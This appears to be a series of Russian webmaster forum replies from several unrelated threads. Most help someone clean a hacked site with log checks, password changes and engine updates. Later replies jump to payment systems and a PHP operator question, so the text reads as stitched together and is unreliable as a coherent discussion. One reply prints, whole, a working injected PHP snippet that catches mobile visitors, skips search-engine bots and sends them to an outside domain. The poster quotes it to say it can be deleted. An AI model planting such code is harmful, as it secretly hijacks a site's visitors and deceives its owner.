Доступ ко всем получили через 1 сайт, еще помимо логов погляди дату изменения файлов, мб не замел следы...
Не понял что-то
Логи проверь.
Сталкивался, в функтинон.пхп был код который выводил ссылки на месте точек в тексте) беспальва)))
Но там в шаблон был вставлен этот код еще до его скачивания. У тебя же сайт дырявый или даже сайты )
Ты проверял другие в аккаунте? Я посмотрел на 1 IP, там с такой же проблемой есть. Вот например http://carsplanet.ru/ , http://www.avpromo.ru/ http://kometa-hotel.ru/ ваши?
Все на неткатах старых, это поди ваши клиенты, которым вы визитки делали и продвигаете их, запущенно все пц ))
ЗЫ Ябы сделал так:
1. Проверил ПК на вирусы, все где сохранены данные от фтп
2. Сменил пароль от фтп
3. Сменил пароли от админок у всех сайтов
4. обновил все движки и модули, удалив предварительно лишнее: нерабочие форумы, старые версий сайтов и т.д.
Примерно так. Доступ к фтп у вас, вам виднее как там, что...
Старая версия сайта на чем и на кой черт ты её держишь?
Эта последняя версия движка?
Потому что подразумевается, что администратор сайта, хоть немного разбирается в безопасности и способен защитить свой ресурс, как и свой копьютер и всё то, за что он несет ответственность, в случае с веб-сайтом ответственность перед людьми, что его посещают и не хотят быть жертвами!
Не торопись, еще даже движок какой неизвестно :)
Нет не у этого, у него по другому ссылки выводятся)
Это мобильный редирект, можешь удалять)
if ((preg_match('/text\/vnd.wap.wml|application\/vnd.wap.xhtml\+xml/si', @$_SERVER['HTTP_ACCEPT']) || preg_match('/alcatel|amoi|android|avantgo|blackberry|benq|cell|cricket|docomo|elaine|htc|iemobile|iphone|ipad|ipaq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola|nec-|nokia|palm|panasonic|philips|phone|sagem|sharp|sie-|smartphone|sony|symbian|t-mobile|telus|up\.browser|up\.link|vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || preg_match('/msearch|m\?q=/si', @$_SERVER['HTTP_REFERER'])) && !preg_match('/macintosh|america|avant|download|windows\-media\-player|yandex|google/si', @$_SERVER['HTTP_USER_AGENT'])) { echo '<script>window.location="http://mobile-mobi.info/?2"</script>'; flush(); exit; }
YNoskov, Покажи сайт, то из того что ты сказал я понял только то, что ты собираешься устранить следствие.
на Биткоин 😂
Причем тут ЭПС, если деньги выводятся через менял. Какие косяки?
Я не могу представить твою схему, например я заказал у тебя скрипт, оплатил тебе ВМ и что ты потом ВМ менять будешь на другие ЭД, а потом выводить их на пластик через два с половиной менялы, которые на форумах свои услуги предлагают? :)
ЗЫ ВМ это под рунет платежка, тут смысла нет сидеть на чем либо другом. Тут и БЛ и отзывы и аттестаты и еще куча полезной инфы, которая может дать представление о человеке, а если ты сидишь на LR или палке, на которых можно каждый день новый аккаунт регать, кто с тобой работать будет? ЯД дак это вообще залупа, я как в первый день несколько лет назад забыл пароль платежный, так и немогу от туда свои 500 рубликов забрать )))) Вообще дело не в этом а в безопасности, сколько тем, что угнали ЯД
http://www.bestchange.ru/
Происходит тоже самое что и "=", можешь стереть "&" и убедиться, я лично так сделал 😂. Попробуй поменять "&=" на "=&" и посмотри работу скрипта.
Попробуй поменять местами - &= на =&
